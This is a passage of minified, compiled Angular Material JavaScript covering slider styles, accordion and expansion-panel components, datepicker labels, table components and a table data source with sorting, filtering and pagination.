.mat-slider-ticks{width:2px;height:100%}.mat-slider-vertical .mat-slider-thumb-container{height:100%;width:0;left:50%}.mat-slider-vertical .mat-slider-thumb{-webkit-backface-visibility:hidden;backface-visibility:hidden}.mat-slider-vertical .mat-slider-thumb-label{bottom:-14px;left:-40px;transform:translateX(26px) scale(0.01) rotate(-45deg)}.mat-slider-vertical .mat-slider-thumb-label-text{transform:rotate(45deg)}.mat-slider-vertical.cdk-focused .mat-slider-thumb-label{transform:rotate(-45deg)}[dir=rtl] .mat-slider-wrapper::after{left:0;right:auto}[dir=rtl] .mat-slider-horizontal .mat-slider-track-fill{transform-origin:100% 100%}[dir=rtl] .mat-slider-horizontal .mat-slider-track-background{transform-origin:0 0}[dir=rtl] .mat-slider-horizontal.mat-slider-axis-inverted .mat-slider-track-fill{transform-origin:0 0}[dir=rtl] .mat-slider-horizontal.mat-slider-axis-inverted .mat-slider-track-background{transform-origin:100% 100%}.mat-slider._mat-animation-noopable .mat-slider-track-fill,.mat-slider._mat-animation-noopable .mat-slider-track-background,.mat-slider._mat-animation-noopable .mat-slider-ticks,.mat-slider._mat-animation-noopable .mat-slider-thumb-container,.mat-slider._mat-animation-noopable .mat-slider-focus-ring,.mat-slider._mat-animation-noopable .mat-slider-thumb,.mat-slider._mat-animation-noopable .mat-slider-thumb-label,.mat-slider._mat-animation-noopable .mat-slider-thumb-label-text,.mat-slider._mat-animation-noopable .mat-slider-has-ticks .mat-slider-wrapper::after{transition:none}'],encapsulation:2,changeDetection:0}),t})();function EV(t){return!isNaN(t)&&isFinite(t)}function mb(t){return"t"===t.type[0]}function DV(t,a){let e;return e=mb(t)?"number"==typeof a?v8(t.touches,a)||v8(t.changedTouches,a):t.touches[0]||t.changedTouches[0]:t,e?{x:e.clientX,y:e.clientY}:void 0}function v8(t,a){for(let e=0;e<t.length;e++)if(t[e].identifier===a)return t[e]}let xV=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[rn,la,la]}),t})(),V2e=0;const A8=new ni("CdkAccordion");let B2e=(()=>{class t{constructor(){this._stateChanges=new J,this._openCloseAllActions=new J,this.id="cdk-accordion-"+V2e++,this._multi=!1}get multi(){return this._multi}set multi(e){this._multi=wi(e)}openAll(){this._multi&&this._openCloseAllActions.next(!0)}closeAll(){this._openCloseAllActions.next(!1)}ngOnChanges(e){this._stateChanges.next(e)}ngOnDestroy(){this._stateChanges.complete(),this._openCloseAllActions.complete()}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275dir=Ot({type:t,selectors:[["cdk-accordion"],["","cdkAccordion",""]],inputs:{multi:"multi"},exportAs:["cdkAccordion"],features:[ki([{provide:A8,useExisting:t}]),sa]}),t})(),H2e=0,U2e=(()=>{class t{constructor(e,i,n){this.accordion=e,this._changeDetectorRef=i,this._expansionDispatcher=n,this._openCloseAllSubscription=I.EMPTY,this.closed=new Tt,this.opened=new Tt,this.destroyed=new Tt,this.expandedChange=new Tt,this.id="cdk-accordion-child-"+H2e++,this._expanded=!1,this._disabled=!1,this._removeUniqueSelectionListener=()=>{},this._removeUniqueSelectionListener=n.listen((r,c)=>{this.accordion&&!this.accordion.multi&&this.accordion.id===c&&this.id!==r&&(this.expanded=!1)}),this.accordion&&(this._openCloseAllSubscription=this._subscribeToOpenCloseAllActions())}get expanded(){return this._expanded}set expanded(e){e=wi(e),this._expanded!==e&&(this._expanded=e,this.expandedChange.emit(e),e?(this.opened.emit(),this._expansionDispatcher.notify(this.id,this.accordion?this.accordion.id:this.id)):this.closed.emit(),this._changeDetectorRef.markForCheck())}get disabled(){return this._disabled}set disabled(e){this._disabled=wi(e)}ngOnDestroy(){this.opened.complete(),this.closed.complete(),this.destroyed.emit(),this.destroyed.complete(),this._removeUniqueSelectionListener(),this._openCloseAllSubscription.unsubscribe()}toggle(){this.disabled||(this.expanded=!this.expanded)}close(){this.disabled||(this.expanded=!1)}open(){this.disabled||(this.expanded=!0)}_subscribeToOpenCloseAllActions(){return this.accordion._openCloseAllActions.subscribe(e=>{this.disabled||(this.expanded=e)})}}return t.\u0275fac=function(e){return new(e||t)(Ee(A8,12),Ee(Ma),Ee(aw))},t.\u0275dir=Ot({type:t,selectors:[["cdk-accordion-item"],["","cdkAccordionItem",""]],inputs:{expanded:"expanded",disabled:"disabled"},outputs:{closed:"closed",opened:"opened",destroyed:"destroyed",expandedChange:"expandedChange"},exportAs:["cdkAccordionItem"],features:[ki([{provide:A8,useValue:void 0}])]}),t})(),q2e=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({}),t})();const G2e=["body"];function j2e(t,a){}const Q2e=[[["mat-expansion-panel-header"]],"*",[["mat-action-row"]]],$2e=["mat-expansion-panel-header","*","mat-action-row"];function K2e(t,a){1&t&&it(0,"span",2),2&t&&V("@indicatorRotate",B()._getExpandedState())}const X2e=[[["mat-panel-title"]],[["mat-panel-description"]],"*"],Y2e=["mat-panel-title","mat-panel-description","*"],T8=new ni("MAT_ACCORDION"),wV="225ms cubic-bezier(0.4,0.0,0.2,1)",IV={indicatorRotate:nr("indicatorRotate",[sn("collapsed, void",zi({transform:"rotate(0deg)"})),sn("expanded",zi({transform:"rotate(180deg)"})),gn("expanded <=> collapsed, void => collapsed",En(wV))]),bodyExpansion:nr("bodyExpansion",[sn("collapsed, void",zi({height:"0px",visibility:"hidden"})),sn("expanded",zi({height:"*",visibility:"visible"})),gn("expanded <=> collapsed, void => collapsed",En(wV))])},RV=new ni("MAT_EXPANSION_PANEL");let gp=(()=>{class t{constructor(e,i){this._template=e,this._expansionPanel=i}}return t.\u0275fac=function(e){return new(e||t)(Ee(ho),Ee(RV,8))},t.\u0275dir=Ot({type:t,selectors:[["ng-template","matExpansionPanelContent",""]]}),t})(),J2e=0;const SV=new ni("MAT_EXPANSION_PANEL_DEFAULT_OPTIONS");let Ec=(()=>{class t extends U2e{constructor(e,i,n,r,c,d,T){super(e,i,n),this._viewContainerRef=r,this._animationMode=d,this._hideToggle=!1,this.afterExpand=new Tt,this.afterCollapse=new Tt,this._inputChanges=new J,this._headerId="mat-expansion-panel-header-"+J2e++,this._bodyAnimationDone=new J,this.accordion=e,this._document=c,this._bodyAnimationDone.pipe(Bh((k,q)=>k.fromState===q.fromState&&k.toState===q.toState)).subscribe(k=>{"void"!==k.fromState&&("expanded"===k.toState?this.afterExpand.emit():"collapsed"===k.toState&&this.afterCollapse.emit())}),T&&(this.hideToggle=T.hideToggle)}get hideToggle(){return this._hideToggle||this.accordion&&this.accordion.hideToggle}set hideToggle(e){this._hideToggle=wi(e)}get togglePosition(){return this._togglePosition||this.accordion&&this.accordion.togglePosition}set togglePosition(e){this._togglePosition=e}_hasSpacing(){return!!this.accordion&&this.expanded&&"default"===this.accordion.displayMode}_getExpandedState(){return this.expanded?"expanded":"collapsed"}toggle(){this.expanded=!this.expanded}close(){this.expanded=!1}open(){this.expanded=!0}ngAfterContentInit(){this._lazyContent&&this._lazyContent._expansionPanel===this&&this.opened.pipe(Ro(null),Dn(()=>this.expanded&&!this._portal),Cn(1)).subscribe(()=>{this._portal=new Mm(this._lazyContent._template,this._viewContainerRef)})}ngOnChanges(e){this._inputChanges.next(e)}ngOnDestroy(){super.ngOnDestroy(),this._bodyAnimationDone.complete(),this._inputChanges.complete()}_containsFocus(){if(this._body){const e=this._document.activeElement,i=this._body.nativeElement;return e===i||i.contains(e)}return!1}}return t.\u0275fac=function(e){return new(e||t)(Ee(T8,12),Ee(Ma),Ee(aw),Ee(fo),Ee(ga),Ee(ar,8),Ee(SV,8))},t.\u0275cmp=Wt({type:t,selectors:[["mat-expansion-panel"]],contentQueries:function(e,i,n){if(1&e&&fa(n,gp,5),2&e){let r;Vt(r=Bt())&&(i._lazyContent=r.first)}},viewQuery:function(e,i){if(1&e&&Mi(G2e,5),2&e){let n;Vt(n=Bt())&&(i._body=n.first)}},hostAttrs:[1,"mat-expansion-panel"],hostVars:6,hostBindings:function(e,i){2&e&&Ct("mat-expanded",i.expanded)("_mat-animation-noopable","NoopAnimations"===i._animationMode)("mat-expansion-panel-spacing",i._hasSpacing())},inputs:{disabled:"disabled",expanded:"expanded",hideToggle:"hideToggle",togglePosition:"togglePosition"},outputs:{opened:"opened",closed:"closed",expandedChange:"expandedChange",afterExpand:"afterExpand",afterCollapse:"afterCollapse"},exportAs:["matExpansionPanel"],features:[ki([{provide:T8,useValue:void 0},{provide:RV,useExisting:t}]),ci,sa],ngContentSelectors:$2e,decls:7,vars:4,consts:[["role","region",1,"mat-expansion-panel-content",3,"id"],["body",""],[1,"mat-expansion-panel-body"],[3,"cdkPortalOutlet"]],template:function(e,i){1&e&&(Jn(Q2e),va(0),m(1,"div",0,1),he("@bodyExpansion.done",function(r){return i._bodyAnimationDone.next(r)}),m(3,"div",2),va(4,1),ne(5,j2e,0,0,"ng-template",3),u(),va(6,2),u()),2&e&&(C(1),V("@bodyExpansion",i._getExpandedState())("id",i.id),Rt("aria-labelledby",i._headerId),C(4),V("cdkPortalOutlet",i._portal))},dependencies:[Cu],styles:['.mat-expansion-panel{box-sizing:content-box;display:block;margin:0;border-radius:4px;overflow:hidden;transition:margin 225ms cubic-bezier(0.4, 0, 0.2, 1),box-shadow 280ms cubic-bezier(0.4, 0, 0.2, 1);position:relative}.mat-accordion .mat-expansion-panel:not(.mat-expanded),.mat-accordion .mat-expansion-panel:not(.mat-expansion-panel-spacing){border-radius:0}.mat-accordion .mat-expansion-panel:first-of-type{border-top-right-radius:4px;border-top-left-radius:4px}.mat-accordion .mat-expansion-panel:last-of-type{border-bottom-right-radius:4px;border-bottom-left-radius:4px}.cdk-high-contrast-active .mat-expansion-panel{outline:solid 1px}.mat-expansion-panel.ng-animate-disabled,.ng-animate-disabled .mat-expansion-panel,.mat-expansion-panel._mat-animation-noopable{transition:none}.mat-expansion-panel-content{display:flex;flex-direction:column;overflow:visible}.mat-expansion-panel-content[style*="visibility: hidden"] *{visibility:hidden !important}.mat-expansion-panel-body{padding:0 24px 16px}.mat-expansion-panel-spacing{margin:16px 0}.mat-accordion>.mat-expansion-panel-spacing:first-child,.mat-accordion>*:first-child:not(.mat-expansion-panel) .mat-expansion-panel-spacing{margin-top:0}.mat-accordion>.mat-expansion-panel-spacing:last-child,.mat-accordion>*:last-child:not(.mat-expansion-panel) .mat-expansion-panel-spacing{margin-bottom:0}.mat-action-row{border-top-style:solid;border-top-width:1px;display:flex;flex-direction:row;justify-content:flex-end;padding:16px 8px 16px 24px}.mat-action-row .mat-button-base,.mat-action-row .mat-mdc-button-base{margin-left:8px}[dir=rtl] .mat-action-row .mat-button-base,[dir=rtl] .mat-action-row .mat-mdc-button-base{margin-left:0;margin-right:8px}'],encapsulation:2,data:{animation:[IV.bodyExpansion]},changeDetection:0}),t})(),E8=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275dir=Ot({type:t,selectors:[["mat-action-row"]],hostAttrs:[1,"mat-action-row"]}),t})();class Z2e{}const eCe=dp(Z2e);let Dc=(()=>{class t extends eCe{constructor(e,i,n,r,c,d,T){super(),this.panel=e,this._element=i,this._focusMonitor=n,this._changeDetectorRef=r,this._animationMode=d,this._parentChangeSubscription=I.EMPTY;const k=e.accordion?e.accordion._stateChanges.pipe(Dn(q=>!(!q.hideToggle&&!q.togglePosition))):ha;this.tabIndex=parseInt(T||"")||0,this._parentChangeSubscription=ra(e.opened,e.closed,k,e._inputChanges.pipe(Dn(q=>!!(q.hideToggle||q.disabled||q.togglePosition)))).subscribe(()=>this._changeDetectorRef.markForCheck()),e.closed.pipe(Dn(()=>e._containsFocus())).subscribe(()=>n.focusVia(i,"program")),c&&(this.expandedHeight=c.expandedHeight,this.collapsedHeight=c.collapsedHeight)}get disabled(){return this.panel.disabled}_toggle(){this.disabled||this.panel.toggle()}_isExpanded(){return this.panel.expanded}_getExpandedState(){return this.panel._getExpandedState()}_getPanelId(){return this.panel.id}_getTogglePosition(){return this.panel.togglePosition}_showToggle(){return!this.panel.hideToggle&&!this.panel.disabled}_getHeaderHeight(){const e=this._isExpanded();return e&&this.expandedHeight?this.expandedHeight:!e&&this.collapsedHeight?this.collapsedHeight:null}_keydown(e){switch(e.keyCode){case 32:case 13:es(e)||(e.preventDefault(),this._toggle());break;default:return void(this.panel.accordion&&this.panel.accordion._handleHeaderKeydown(e))}}focus(e,i){e?this._focusMonitor.focusVia(this._element,e,i):this._element.nativeElement.focus(i)}ngAfterViewInit(){this._focusMonitor.monitor(this._element).subscribe(e=>{e&&this.panel.accordion&&this.panel.accordion._handleHeaderFocus(this)})}ngOnDestroy(){this._parentChangeSubscription.unsubscribe(),this._focusMonitor.stopMonitoring(this._element)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Ec,1),Ee(mi),Ee(js),Ee(Ma),Ee(SV,8),Ee(ar,8),Vr("tabindex"))},t.\u0275cmp=Wt({type:t,selectors:[["mat-expansion-panel-header"]],hostAttrs:["role","button",1,"mat-expansion-panel-header","mat-focus-indicator"],hostVars:15,hostBindings:function(e,i){1&e&&he("click",function(){return i._toggle()})("keydown",function(r){return i._keydown(r)}),2&e&&(Rt("id",i.panel._headerId)("tabindex",i.tabIndex)("aria-controls",i._getPanelId())("aria-expanded",i._isExpanded())("aria-disabled",i.panel.disabled),ri("height",i._getHeaderHeight()),Ct("mat-expanded",i._isExpanded())("mat-expansion-toggle-indicator-after","after"===i._getTogglePosition())("mat-expansion-toggle-indicator-before","before"===i._getTogglePosition())("_mat-animation-noopable","NoopAnimations"===i._animationMode))},inputs:{tabIndex:"tabIndex",expandedHeight:"expandedHeight",collapsedHeight:"collapsedHeight"},features:[ci],ngContentSelectors:Y2e,decls:5,vars:3,consts:[[1,"mat-content"],["class","mat-expansion-indicator",4,"ngIf"],[1,"mat-expansion-indicator"]],template:function(e,i){1&e&&(Jn(X2e),m(0,"span",0),va(1),va(2,1),va(3,2),u(),ne(4,K2e,1,1,"span",1)),2&e&&(Ct("mat-content-hide-toggle",!i._showToggle()),C(4),V("ngIf",i._showToggle()))},dependencies:[Ri],styles:['.mat-expansion-panel-header{display:flex;flex-direction:row;align-items:center;padding:0 24px;border-radius:inherit;transition:height 225ms cubic-bezier(0.4, 0, 0.2, 1)}.mat-expansion-panel-header._mat-animation-noopable{transition:none}.mat-expansion-panel-header:focus,.mat-expansion-panel-header:hover{outline:none}.mat-expansion-panel-header.mat-expanded:focus,.mat-expansion-panel-header.mat-expanded:hover{background:inherit}.mat-expansion-panel-header:not([aria-disabled=true]){cursor:pointer}.mat-expansion-panel-header.mat-expansion-toggle-indicator-before{flex-direction:row-reverse}.mat-expansion-panel-header.mat-expansion-toggle-indicator-before .mat-expansion-indicator{margin:0 16px 0 0}[dir=rtl] .mat-expansion-panel-header.mat-expansion-toggle-indicator-before .mat-expansion-indicator{margin:0 0 0 16px}.mat-content{display:flex;flex:1;flex-direction:row;overflow:hidden}.mat-content.mat-content-hide-toggle{margin-right:8px}[dir=rtl] .mat-content.mat-content-hide-toggle{margin-right:0;margin-left:8px}.mat-expansion-toggle-indicator-before .mat-content.mat-content-hide-toggle{margin-left:24px;margin-right:0}[dir=rtl] .mat-expansion-toggle-indicator-before .mat-content.mat-content-hide-toggle{margin-right:24px;margin-left:0}.mat-expansion-panel-header-title,.mat-expansion-panel-header-description{display:flex;flex-grow:1;flex-basis:0;margin-right:16px;align-items:center}[dir=rtl] .mat-expansion-panel-header-title,[dir=rtl] .mat-expansion-panel-header-description{margin-right:0;margin-left:16px}.mat-expansion-panel-header-description{flex-grow:2}.mat-expansion-indicator::after{border-style:solid;border-width:0 2px 2px 0;content:"";display:inline-block;padding:3px;transform:rotate(45deg);vertical-align:middle}.cdk-high-contrast-active .mat-expansion-panel-content{border-top:1px solid;border-top-left-radius:0;border-top-right-radius:0}'],encapsulation:2,data:{animation:[IV.indicatorRotate]},changeDetection:0}),t})(),wl=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275dir=Ot({type:t,selectors:[["mat-panel-description"]],hostAttrs:[1,"mat-expansion-panel-header-description"]}),t})(),tl=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275dir=Ot({type:t,selectors:[["mat-panel-title"]],hostAttrs:[1,"mat-expansion-panel-header-title"]}),t})(),il=(()=>{class t extends B2e{constructor(){super(...arguments),this._ownHeaders=new Cd,this._hideToggle=!1,this.displayMode="default",this.togglePosition="after"}get hideToggle(){return this._hideToggle}set hideToggle(e){this._hideToggle=wi(e)}ngAfterContentInit(){this._headers.changes.pipe(Ro(this._headers)).subscribe(e=>{this._ownHeaders.reset(e.filter(i=>i.panel.accordion===this)),this._ownHeaders.notifyOnChanges()}),this._keyManager=new L1(this._ownHeaders).withWrap().withHomeAndEnd()}_handleHeaderKeydown(e){this._keyManager.onKeydown(e)}_handleHeaderFocus(e){this._keyManager.updateActiveItem(e)}ngOnDestroy(){super.ngOnDestroy(),this._ownHeaders.destroy()}}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275dir=Ot({type:t,selectors:[["mat-accordion"]],contentQueries:function(e,i,n){if(1&e&&fa(n,Dc,5),2&e){let r;Vt(r=Bt())&&(i._headers=r)}},hostAttrs:[1,"mat-accordion"],hostVars:2,hostBindings:function(e,i){2&e&&Ct("mat-accordion-multi",i.multi)},inputs:{multi:"multi",hideToggle:"hideToggle",displayMode:"displayMode",togglePosition:"togglePosition"},exportAs:["matAccordion"],features:[ki([{provide:T8,useExisting:t}]),ci]}),t})(),kV=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[rn,la,q2e,yu]}),t})(),dCe=(()=>{class t{constructor(){this.changes=new J,this.calendarLabel="Calendar",this.openCalendarLabel="Open calendar",this.closeCalendarLabel="Close calendar",this.prevMonthLabel="Previous month",this.nextMonthLabel="Next month",this.prevYearLabel="Previous year",this.nextYearLabel="Next year",this.prevMultiYearLabel="Previous 24 years",this.nextMultiYearLabel="Next 24 years",this.switchToMonthViewLabel="Choose date",this.switchToMultiYearViewLabel="Choose month and year",this.startDateLabel="Start date",this.endDateLabel="End date"}formatYearRange(e,i){return`${e} \u2013 ${i}`}formatYearRangeLabel(e,i){return`${e} to ${i}`}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})();const NV={transformPanel:nr("transformPanel",[gn("void => enter-dropdown",En("120ms cubic-bezier(0, 0, 0.2, 1)",ng([zi({opacity:0,transform:"scale(1, 0.8)"}),zi({opacity:1,transform:"scale(1, 1)"})]))),gn("void => enter-dialog",En("150ms cubic-bezier(0, 0, 0.2, 1)",ng([zi({opacity:0,transform:"scale(0.7)"}),zi({transform:"none",opacity:1})]))),gn("* => void",En("100ms linear",zi({opacity:0})))]),fadeInCalendar:nr("fadeInCalendar",[sn("void",zi({opacity:0})),sn("enter",zi({opacity:1})),gn("void => *",En("120ms 100ms cubic-bezier(0.55, 0, 0.55, 0.2)"))])},hCe={provide:new ni("mat-datepicker-scroll-strategy"),deps:[As],useFactory:function uCe(t){return()=>t.scrollStrategies.reposition()}};let zV=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({providers:[dCe,hCe],imports:[rn,up,bu,Xy,yu,la,uu]}),t})();const CCe=[[["caption"]],[["colgroup"],["col"]]],yCe=["caption","colgroup, col"];let Au=(()=>{class t extends I3{constructor(){super(...arguments),this.stickyCssClass="mat-table-sticky",this.needsPositionStickyOnElement=!1}}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275cmp=Wt({type:t,selectors:[["mat-table"],["table","mat-table",""]],hostAttrs:[1,"mat-table"],hostVars:2,hostBindings:function(e,i){2&e&&Ct("mat-table-fixed-layout",i.fixedLayout)},exportAs:["matTable"],features:[ki([{provide:Ny,useClass:gz},{provide:I3,useExisting:t},{provide:k1,useExisting:t},{provide:gw,useClass:xz},{provide:vw,useValue:null}]),ci],ngContentSelectors:yCe,decls:6,vars:0,consts:[["headerRowOutlet",""],["rowOutlet",""],["noDataRowOutlet",""],["footerRowOutlet",""]],template:function(e,i){1&e&&(Jn(CCe),va(0),va(1,1),Ir(2,0)(3,1)(4,2)(5,3))},dependencies:[E3,D3,x3,w3],styles:["mat-table{display:block}mat-header-row{min-height:56px}mat-row,mat-footer-row{min-height:48px}mat-row,mat-header-row,mat-footer-row{display:flex;border-width:0;border-bottom-width:1px;border-style:solid;align-items:center;box-sizing:border-box}mat-cell:first-of-type,mat-header-cell:first-of-type,mat-footer-cell:first-of-type{padding-left:24px}[dir=rtl] mat-cell:first-of-type:not(:only-of-type),[dir=rtl] mat-header-cell:first-of-type:not(:only-of-type),[dir=rtl] mat-footer-cell:first-of-type:not(:only-of-type){padding-left:0;padding-right:24px}mat-cell:last-of-type,mat-header-cell:last-of-type,mat-footer-cell:last-of-type{padding-right:24px}[dir=rtl] mat-cell:last-of-type:not(:only-of-type),[dir=rtl] mat-header-cell:last-of-type:not(:only-of-type),[dir=rtl] mat-footer-cell:last-of-type:not(:only-of-type){padding-right:0;padding-left:24px}mat-cell,mat-header-cell,mat-footer-cell{flex:1;display:flex;align-items:center;overflow:hidden;word-wrap:break-word;min-height:inherit}table.mat-table{border-spacing:0}tr.mat-header-row{height:56px}tr.mat-row,tr.mat-footer-row{height:48px}th.mat-header-cell{text-align:left}[dir=rtl] th.mat-header-cell{text-align:right}th.mat-header-cell,td.mat-cell,td.mat-footer-cell{padding:0;border-bottom-width:1px;border-bottom-style:solid}th.mat-header-cell:first-of-type,td.mat-cell:first-of-type,td.mat-footer-cell:first-of-type{padding-left:24px}[dir=rtl] th.mat-header-cell:first-of-type:not(:only-of-type),[dir=rtl] td.mat-cell:first-of-type:not(:only-of-type),[dir=rtl] td.mat-footer-cell:first-of-type:not(:only-of-type){padding-left:0;padding-right:24px}th.mat-header-cell:last-of-type,td.mat-cell:last-of-type,td.mat-footer-cell:last-of-type{padding-right:24px}[dir=rtl] th.mat-header-cell:last-of-type:not(:only-of-type),[dir=rtl] td.mat-cell:last-of-type:not(:only-of-type),[dir=rtl] td.mat-footer-cell:last-of-type:not(:only-of-type){padding-right:0;padding-left:24px}.mat-table-sticky{position:sticky !important}.mat-table-fixed-layout{table-layout:fixed}"],encapsulation:2}),t})(),Dm=(()=>{class t extends P1{}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275dir=Ot({type:t,selectors:[["","matCellDef",""]],features:[ki([{provide:P1,useExisting:t}]),ci]}),t})(),Tu=(()=>{class t extends O1{}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275dir=Ot({type:t,selectors:[["","matHeaderCellDef",""]],features:[ki([{provide:O1,useExisting:t}]),ci]}),t})(),xm=(()=>{class t extends Nh{get name(){return this._name}set name(e){this._setNameInput(e)}_updateColumnCssClassName(){super._updateColumnCssClassName(),this._columnCssClassName.push(`mat-column-${this.cssClassFriendlyName}`)}}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275dir=Ot({type:t,selectors:[["","matColumnDef",""]],inputs:{sticky:"sticky",name:["matColumnDef","name"]},features:[ki([{provide:Nh,useExisting:t},{provide:"MAT_SORT_HEADER_COLUMN_DEF",useExisting:t}]),ci]}),t})(),Eu=(()=>{class t extends pw{}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275dir=Ot({type:t,selectors:[["mat-header-cell"],["th","mat-header-cell",""]],hostAttrs:["role","columnheader",1,"mat-header-cell"],features:[ci]}),t})(),wm=(()=>{class t extends _w{}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275dir=Ot({type:t,selectors:[["mat-cell"],["td","mat-cell",""]],hostAttrs:["role","gridcell",1,"mat-cell"],features:[ci]}),t})(),jh=(()=>{class t extends Uy{}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275dir=Ot({type:t,selectors:[["","matHeaderRowDef",""]],inputs:{columns:["matHeaderRowDef","columns"],sticky:["matHeaderRowDefSticky","sticky"]},features:[ki([{provide:Uy,useExisting:t}]),ci]}),t})(),Du=(()=>{class t extends A3{}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275dir=Ot({type:t,selectors:[["","matRowDef",""]],inputs:{columns:["matRowDefColumns","columns"],when:["matRowDefWhen","when"]},features:[ki([{provide:A3,useExisting:t}]),ci]}),t})(),Qh=(()=>{class t extends yw{}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275cmp=Wt({type:t,selectors:[["mat-header-row"],["tr","mat-header-row",""]],hostAttrs:["role","row",1,"mat-header-row"],exportAs:["matHeaderRow"],features:[ki([{provide:yw,useExisting:t}]),ci],decls:1,vars:0,consts:[["cdkCellOutlet",""]],template:function(e,i){1&e&&Ir(0,0)},dependencies:[Lh],encapsulation:2}),t})(),xc=(()=>{class t extends Mw{}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275cmp=Wt({type:t,selectors:[["mat-row"],["tr","mat-row",""]],hostAttrs:["role","row",1,"mat-row"],exportAs:["matRow"],features:[ki([{provide:Mw,useExisting:t}]),ci],decls:1,vars:0,consts:[["cdkCellOutlet",""]],template:function(e,i){1&e&&Ir(0,0)},dependencies:[Lh],encapsulation:2}),t})(),Cp=(()=>{class t extends T3{constructor(){super(...arguments),this._contentClassName="mat-no-data-row"}}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275dir=Ot({type:t,selectors:[["ng-template","matNoDataRow",""]],features:[ki([{provide:T3,useExisting:t}]),ci]}),t})(),WV=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[Aw,la,la]}),t})();class ICe extends _z{constructor(a=[]){super(),this._renderData=new zs([]),this._filter=new zs(""),this._internalPageChanges=new J,this._renderChangesSubscription=null,this.sortingDataAccessor=(e,i)=>{const n=e[i];if(pz(n)){const r=Number(n);return r<9007199254740991?r:n}return n},this.sortData=(e,i)=>{const n=i.active,r=i.direction;return n&&""!=r?e.sort((c,d)=>{let T=this.sortingDataAccessor(c,n),k=this.sortingDataAccessor(d,n);const q=typeof T,Y=typeof k;q!==Y&&("number"===q&&(T+=""),"number"===Y&&(k+=""));let te=0;return null!=T&&null!=k?T>k?te=1:T<k&&(te=-1):null!=T?te=1:null!=k&&(te=-1),te*("asc"==r?1:-1)}):e},this.filterPredicate=(e,i)=>{const n=Object.keys(e).reduce((c,d)=>c+e[d]+"\u25ec","").toLowerCase(),r=i.trim().toLowerCase();return-1!=n.indexOf(r)},this._data=new zs(a),this._updateChangeSubscription()}get data(){return this._data.value}set data(a){a=Array.isArray(a)?a:[],this._data.next(a),this._renderChangesSubscription||this._filterData(a)}get filter(){return this._filter.value}set filter(a){this._filter.next(a),this._renderChangesSubscription||this._filterData(this.data)}get sort(){return this._sort}set sort(a){this._sort=a,this._updateChangeSubscription()}get paginator(){return this._paginator}set paginator(a){this._paginator=a,this._updateChangeSubscription()}_updateChangeSubscription(){var a;const e=this._sort?ra(this._sort.sortChange,this._sort.initialized):Bi(null),i=this._paginator?ra(this._paginator.page,this._internalPageChanges,this._paginator.initialized):Bi(null),r=mg([this._data,this._filter]).pipe(Xe(([T])=>this._filterData(T))),c=mg([r,e]).pipe(Xe(([T])=>this._orderData(T))),d=mg([c,i]).pipe(Xe(([T])=>this._pageData(T)));null===(a=this._renderChangesSubscription)||void 0===a||a.unsubscribe(),this._renderChangesSubscription=d.subscribe(T=>this._renderData.next(T))}_filterData(a){return this.filteredData=null==this.filter||""===this.filter?a:a.filter(e=>this.filterPredicate(e,this.filter)),this.paginator&&this._updatePaginator(this.filteredData.length),this.filteredData}_orderData(a){return this.sort?this.sortData(a.slice(),this.sort):a}_pageData(a){if(!this.paginator)return a;const e=this.paginator.pageIndex*this.paginator.pageSize;return a.slice(e,e+this.paginator.pageSize)}_updatePaginator(a){Promise.resolve().then(()=>{const e=this.paginator;if(e&&(e.length=a,e.pageIndex>0)){const i=Math.ceil(e.length/e.pageSize)-1||0,n=Math.min(e.pageIndex,i);n!==e.pageIndex&&(e.pageIndex=n,this._internalPageChanges.next())}})}connect(){return this._renderChangesSubscription||this._updateChangeSubscription(),this._renderData}disconnect(){var a;null===(a=this._renderChangesSubscription)||void 0===a||a.unsubscribe(),this._renderChangesSubscription=null}}class zd extends ICe{}const RCe=["mat-sort-header",""];function SCe(t,a){if(1&t){const e=Ye();m(0,"div",3),he("@arrowPosition.start",function(){return be(e),Me(B()._disableViewStateAnimation=!0)})("@arrowPosition.done",function(){return be(e),Me(B()._disableViewStateAnimation=!1)}),it(1,"div",4),m(2,"div",5),it(3,"div",6)(4,"div",7)(5,"div",8),u()()}if(2&t){const e=B();V("@arrowOpacity",e._getArrowViewState())("@arrowPosition",e._getArrowViewState())("@allowChildren",e._getArrowDirectionState()),C(2),V("@indicator",e._getArrowDirectionState()),C(1),V("@leftPointer",e._getArrowDirectionState()),C(1),V("@rightPointer",e._getArrowDirectionState())}}const kCe=["*"],FV=new ni("MAT_SORT_DEFAULT_OPTIONS"),PCe=yW(Zc(class{}));let al=(()=>{class t extends PCe{constructor(e){super(),this._defaultOptions=e,this.sortables=new Map,this._stateChanges=new 